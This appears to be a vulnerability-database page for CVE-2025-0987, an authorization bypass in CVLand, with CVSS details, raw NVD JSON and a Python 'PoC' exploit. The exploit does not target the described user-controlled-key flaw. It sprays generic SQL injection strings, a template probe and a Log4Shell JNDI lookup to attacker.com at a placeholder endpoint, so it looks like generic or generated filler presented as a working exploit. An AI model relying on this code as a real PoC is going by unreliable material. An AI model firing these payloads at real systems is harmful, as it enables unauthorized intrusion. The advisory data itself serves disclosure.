Security Vulnerability Report
CVE-2025-0987 CVSS 9.9 CRITICAL

CVE-2025-0987

Published: 2025-11-03 12:15:33
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key vulnerability in CB Project Ltd. Co. CVLand allows Parameter Injection. This issue affects CVLand: from 2.1.0 through 20251103. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

CVLand versions 2.1.0 through 2025-11-03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0987 PoC - CVLand Authorization Bypass via Parameter Injection
# Description: The vulnerability allows attackers to bypass authorization checks
# by manipulating user-controlled keys in CVLand application parameters

import requests
import json

TARGET_URL = "https://target-cvland-server.com"
CVE_ID = "CVE-2025-0987"


def exploit_authorization_bypass():
    """
    Exploit for Authorization Bypass Through User-Controlled Key
    in CVLand via Parameter Injection
    """
    print(f"[*] Exploiting {CVE_ID} - CVLand Parameter Injection")

    # Step 1: Identify the vulnerable endpoint and parameter
    # The application uses user-controlled keys that can be manipulated
    vulnerable_params = {
        'user_id': 'ATTACKER_CONTROLLED_VALUE',
        'auth_token': 'manipulated_token',
        'access_key': 'bypass_key_injection'
    }

    # Step 2: Send malicious request with parameter injection
    # Inject authorization bypass payload into user-controlled parameters
    inject_payloads = [
        "' OR '1'='1",
        "admin'--",
        "{{constructor}}",
        "${jndi:ldap://attacker.com/exploit}"
    ]

    for payload in inject_payloads:
        print(f"[*] Testing payload: {payload}")
        exploit_data = {
            'key': payload,
            'action': 'view',
            'resource_id': '1'
        }
        try:
            response = requests.post(
                f"{TARGET_URL}/api/endpoint",
                data=exploit_data,
                headers={
                    'User-Agent': f'Mozilla/5.0 - {CVE_ID} Exploit',
                    'Content-Type': 'application/x-www-form-urlencoded'
                },
                timeout=10,
                verify=False
            )
            # Check for successful bypass indicators
            if response.status_code == 200 and 'unauthorized' not in response.text.lower():
                print(f"[!] Potential authorization bypass detected!")
                print(f"[+] Response: {response.text[:500]}")
                return True
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")

    return False


if __name__ == "__main__":
    print(f"[*] CVE-2025-0987 CVLand Authorization Bypass Exploit")
    result = exploit_authorization_bypass()
    if result:
        print("[+] Exploit successful - Authorization bypass achieved")
    else:
        print("[-] Exploit may have failed - Verify manually")

References

https://www.usom.gov.tr/bildirim/tr-25-0371

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0987", "sourceIdentifier": "[email protected]", "published": "2025-11-03T12:15:33.383", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in CB Project Ltd. Co. CVLand allows Parameter Injection.This issue affects CVLand: from 2.1.0 through 20251103. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0371", "source": "[email protected]"}]}}